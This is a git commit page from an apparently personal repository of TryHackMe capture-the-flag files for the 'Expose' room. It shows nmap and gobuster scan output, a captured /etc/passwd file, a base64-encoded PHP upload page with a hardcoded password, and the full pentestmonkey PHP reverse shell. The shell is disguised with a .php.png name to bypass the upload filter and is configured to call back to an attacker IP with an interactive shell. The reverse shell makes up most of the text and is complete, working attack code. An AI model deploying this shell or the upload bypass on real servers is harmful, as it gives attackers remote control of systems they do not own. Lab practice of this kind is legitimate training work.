curo/TryHackMe
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

initial commit

Browse Source
This commit is contained in:
Curo
2025-12-04 09:57:17 +01:00
commit 0054cc02b1
4851 changed files with 4416257 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

1
CTF/Expose/emails.txt Normal file
View File

@@ -0,0 +1 @@
hacker@root.thm

22
CTF/Expose/gobuster.output Normal file
View File

@@ -0,0 +1,22 @@
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://expose.thm:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 315] [--> http://expose.thm:1337/admin/]
/phpmyadmin (Status: 301) [Size: 320] [--> http://expose.thm:1337/phpmyadmin/]
/%CE%9C%CE%B7%CF%87%CE%B1%CE%BD%CE%B9%CF%83%CE%BC%CF%8C%CF%82_%CF%84%CF%89%CE%BD_%CE%91%CE%BD%CF%84%CE%B9%CE%BA%CF%85%CE%B8%CE%AE%CF%81%CF%89%CE%BD (Status: 414) [Size: 356]
/press-release-the-spanish-government-the-regional-government-of-madrid-and-the-town-hall-of-madrid-sign-a-cooperation-agreement-with-the-international-summit-on-democracy-terrorism-and-security (Status: 414) [Size: 356]

23
CTF/Expose/gobuster_1.output Normal file
View File

@@ -0,0 +1,23 @@
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://expose.thm:1337
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 315] [--> http://expose.thm:1337/admin/]
/javascript (Status: 301) [Size: 320] [--> http://expose.thm:1337/javascript/]
/phpmyadmin (Status: 301) [Size: 320] [--> http://expose.thm:1337/phpmyadmin/]
/server-status (Status: 403) [Size: 277]

74
CTF/Expose/nmap.output Normal file
View File

@@ -0,0 +1,74 @@
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-19 12:07 CEST
Nmap scan report for expose.thm (10.10.216.49)
Host is up (0.043s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.14.99.89
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a3:04:20:56:9f:32:73:ff:50:0d:80:6d:2d:c0:d1:04 (RSA)
| 256 1e:0a:55:db:71:19:ab:1d:43:53:05:8c:d9:b6:42:18 (ECDSA)
|_ 256 af:30:61:89:75:74:0e:ae:9f:a2:90:e3:ea:b2:68:5e (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
1337/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: EXPOSED
1883/tcp open mosquitto version 1.6.9
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/broker/load/messages/sent/1min: 0.91
| $SYS/broker/load/sockets/5min: 0.20
| $SYS/broker/load/connections/15min: 0.07
| $SYS/broker/load/bytes/sent/1min: 3.65
| $SYS/broker/heap/maximum: 49688
| $SYS/broker/load/bytes/received/1min: 16.45
| $SYS/broker/load/messages/received/5min: 0.20
| $SYS/broker/version: mosquitto version 1.6.9
| $SYS/broker/messages/sent: 1
| $SYS/broker/uptime: 110 seconds
| $SYS/broker/store/messages/bytes: 178
| $SYS/broker/load/connections/1min: 0.91
| $SYS/broker/load/bytes/sent/15min: 0.27
| $SYS/broker/messages/received: 1
| $SYS/broker/load/sockets/1min: 0.91
| $SYS/broker/load/sockets/15min: 0.07
| $SYS/broker/load/messages/sent/5min: 0.20
| $SYS/broker/load/bytes/sent/5min: 0.79
| $SYS/broker/load/bytes/received/5min: 3.53
| $SYS/broker/load/messages/sent/15min: 0.07
| $SYS/broker/load/messages/received/1min: 0.91
| $SYS/broker/bytes/received: 18
| $SYS/broker/load/bytes/received/15min: 1.19
| $SYS/broker/bytes/sent: 4
| $SYS/broker/load/messages/received/15min: 0.07
|_ $SYS/broker/load/connections/5min: 0.20
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp)
HOP RTT ADDRESS
1 40.69 ms 10.14.0.1
2 41.53 ms expose.thm (10.10.216.49)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.97 seconds

1
CTF/Expose/passwd.txt Normal file
View File

@@ -0,0 +1 @@
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false zeamkish:x:1001:1001:Zeam Kish,1,1,:/home/zeamkish:/bin/bash ftp:x:114:121:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin bind:x:115:122::/var/cache/bind:/usr/sbin/nologin Debian-snmp:x:116:123::/var/lib/snmp:/bin/false redis:x:117:124::/var/lib/redis:/usr/sbin/nologin mosquitto:x:118:125::/var/lib/mosquitto:/usr/sbin/nologin fwupd-refresh:x:119:126:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin

191
CTF/Expose/php-reverse-shell.php.png Normal file
View File

@@ -0,0 +1,191 @@
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.14.99.89'; // CHANGE THIS
$port = 9000; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>

1
CTF/Expose/php_encode.txt Normal file
View File

@@ -0,0 +1 @@
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCiRiYXNlUGF0aCA9ICIvIjsNCj8+DQoNCg0KDQoNCjwhRE9DVFlQRSBodG1sPg0KPGh0bWwgbGFuZz0iZW4iPg0KDQo8P3BocA0KJGJhc2VQYXRoID0gIiI7DQppbmNsdWRlICdoZWFkZXIucGhwJzsNCj8+DQoNCg0KPCFET0NUWVBFIGh0bWw+DQoNCg0KDQoNCg0KICA8IS0tIE1haW4gQ29udGVudCAtLT4NCjxtYWluIGNsYXNzPSIgbXgtYXV0byBweS04ICBtaW4taC1bODB2aF0gZmxleCBpdGVtcy1jZW50ZXIganVzdGlmeS1jZW50ZXIgZ2FwLTEwIGZsZXgtY29sIHhsOmZsZXgtcm93Ij4NCiA8P3BocA0KIC8vcHJpbnRfcigkX0ZJTEVTKTsNCiAgICAkcGFzc3dvcmQgPSAkX1BPU1RbJ3Bhc3N3b3JkJ10gPz8gJyc7DQogICAgJGVycm9yX21lc3NhZ2UgPSBmYWxzZTsNCgkgaWYgKCRwYXNzd29yZCA9PT0gJ3plYW1raXNoJyBBTkQgIWlzc2V0KCRfU0VTU0lPTlsndmFsaWRhdGVfZmlsZSddKSl7DQoJCSRfU0VTU0lPTlsndmFsaWRhdGVfZmlsZSddID0gdHJ1ZTsNCg0KDQogICAgfQ0KCQ0KCWlmKGlzc2V0KCRfU0VTU0lPTlsndmFsaWRhdGVfZmlsZSddKSl7DQoJDQoJCWlmICghaXNzZXQoJF9GSUxFU1snZmlsZSddKSl7DQoJCWVjaG8gIjxwPiI7DQoJCWVjaG8gJzxoMT5GaWxlIFVwbG9hZDwvaDE+DQoJCQk8Zm9ybSBtZXRob2Q9IlBPU1QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG9uc3VibWl0PSJyZXR1cm4gdmFsaWRhdGUoKTsiIGlkPSJ2YWxpZGZvcm0iPg0KCQkJPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIGlkPSJmaWxlIiBhY2NlcHQ9Ii5wbmciIHJlcXVpcmVkPg0KCQkJPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IlVwbG9hZCI+DQoJCQk8L2Zvcm0+JzsNCgkJDQoJCWVjaG8gIjwvcD4iOw0KCX0NCgllbHNlew0KCQkNCgkJCQkkdGFyZ2V0RGlyID0gInVwbG9hZF90aG1fMTAwMS8iOyAvLyBEaXJlY3Rvcnkgd2hlcmUgdXBsb2FkZWQgZmlsZXMgd2lsbCBiZSBzdG9yZWQNCgkJCQkkdGFyZ2V0RmlsZSA9ICR0YXJnZXREaXIgLiBiYXNlbmFtZSgkX0ZJTEVTWyJmaWxlIl1bIm5hbWUiXSk7IC8vIFBhdGggb2YgdGhlIHVwbG9hZGVkIGZpbGUNCg0KCQkJCQkvLyBDaGVjayBpZiBmaWxlIGlzIGEgdmFsaWQgdXBsb2FkDQoJCQkJaWYgKG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmaWxlIl1bInRtcF9uYW1lIl0sICR0YXJnZXRGaWxlKSkgew0KCQkJCWVjaG8gJzxoMT5GaWxlIHVwbG9hZGVkIHN1Y2Nlc3NmdWxseSEgTWF5YmUgbG9vayBpbiBzb3VyY2UgY29kZSB0byBzZWUgdGhlIHBhdGg8c3BhbiBzdHlsZT0iIGRpc3BsYXk6IG5vbmU7Ij5pbiAvdXBsb2FkX3RobV8xMDAxIGZvbGRlcjwvc3Bhbj4gPGgxPic7DQoJCQkJfSBlbHNlIHsNCgkJCQllY2hvICJFcnJvciB1cGxvYWRpbmcgZmlsZS4iOw0KCQkJCX0NCg0KCSAgZXhpdDsNCgl9DQoJfQ0KCWVsc2V7DQoJCQ0KCQ0KCSAgaWYgKCRwYXNzd29yZCA9PT0gJ3plYW1raXNoJyBBTkQgIWlzc2V0KCRfU0VTU0lPTlsndmFsaWRhdGVfZmlsZSddKSl7DQoJCSRfU0VTU0lPTlsndmFsaWRhdGVfZmlsZSddID0gdHJ1ZTsNCg0KDQogICAgfSBlbHNlIHsNCiAgICAgIGVjaG8gJzxkaXYgY2xhc3M9ImZpeGVkIGluc2V0LTAgIGZsZXggaXRlbXMtY2VudGVyIGp1c3RpZnktY2VudGVyIGJnLWdyYXktOTAwIGJnLW9wYWNpdHktNTAiPic7DQogICAgICBlY2hvICc8ZGl2IGNsYXNzPSJiZy13aGl0ZSByb3VuZGVkIHAtOCBtYXgtdy1zbSBteC1hdXRvIj4nOw0KICAgICAgZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIiA+JzsNCiAgICAgIGVjaG8gJzxsYWJlbCBjbGFzcz0iYmxvY2sgbWItNCI+UGxlYXNlIGVudGVyIHRoZSBwYXNzd29yZDogDQoJICA8YnI+SGludDogSXQgaXMgdGhlIG5hbWUgb2YgbWFjaGluZSB1c2VyIHN0YXJ0aW5nIHdpdGggbGV0dGVyICJ6IjwvbGFiZWw+JzsNCiAgICAgIGVjaG8gJzxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icGFzc3dvcmQiIGNsYXNzPSJ3LWZ1bGwgcC0yIGJvcmRlciByb3VuZGVkIj4nOw0KICAgICAgZWNobyAnPGJ1dHRvbiB0eXBlPSJzdWJtaXQiIGNsYXNzPSJiZy1ncmF5LTkwMCB0ZXh0LXdoaXRlIHB4LTQgcHktMiBtdC00IHJvdW5kZWQgaG92ZXI6YmctZ3JheS03MDAiPlN1Ym1pdDwvYnV0dG9uPic7DQogICAgICBlY2hvICc8L2Zvcm0+JzsNCiAgICAgIGVjaG8gJzwvZGl2Pic7DQogICAgICBlY2hvICc8L2Rpdj4nOw0KICAgICAgICAkZXJyb3JfbWVzc2FnZSA9IHRydWU7DQoNCiAgICB9DQoJDQoJDQoJfQ0KCQ0KCQ0KCQ0KCQ0KICANCiAgICA/Pg0KIA0KPC9tYWluPg0KPD9waHANCmluY2x1ZGUgJ2Zvb3Rlci5waHAnOw0KPz4NCjwvYm9keT4NCg0KPHNjcmlwdD4NCg0KDQpmdW5jdGlvbiB2YWxpZGF0ZSgpew0KDQogdmFyIGZpbGVJbnB1dCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdmaWxlJyk7DQogIHZhciBmaWxlID0gZmlsZUlucHV0LmZpbGVzWzBdOw0KICANCiAgaWYgKGZpbGUpIHsNCiAgICB2YXIgZmlsZU5hbWUgPSBmaWxlLm5hbWU7DQogICAgdmFyIGZpbGVFeHRlbnNpb24gPSBmaWxlTmFtZS5zcGxpdCgnLicpLnBvcCgpLnRvTG93ZXJDYXNlKCk7DQogICAgDQogICAgaWYgKGZpbGVFeHRlbnNpb24gPT09ICdqcGcnIHx8IGZpbGVFeHRlbnNpb24gPT09ICdwbmcnKSB7DQogICAgICAvLyBWYWxpZCBmaWxlIGV4dGVuc2lvbiwgcHJvY2VlZCB3aXRoIGZpbGUgdXBsb2FkDQogICAgICAvLyBZb3UgY2FuIHN1Ym1pdCB0aGUgZm9ybSBvciBwZXJmb3JtIGZ1cnRoZXIgcHJvY2Vzc2luZyBoZXJlDQogICAgICBjb25zb2xlLmxvZygnRmlsZSB1cGxvYWRlZCBzdWNjZXNzZnVsbHknKTsNCgkgIHJldHVybiB0cnVlOw0KICAgIH0gZWxzZSB7DQogICAgICAvLyBJbnZhbGlkIGZpbGUgZXh0ZW5zaW9uLCBkaXNwbGF5IGFuIGVycm9yIG1lc3NhZ2Ugb3IgdGFrZSBhcHByb3ByaWF0ZSBhY3Rpb24NCiAgICAgIGNvbnNvbGUubG9nKCdPbmx5IEpQRyBhbmQgUE5HIGZpbGVzIGFyZSBhbGxvd2VkJyk7DQoJICByZXR1cm4gZmFsc2U7DQogICAgfQ0KICB9DQp9DQoNCjwvc2NyaXB0Pg0KPC9odG1sPg0KDQo=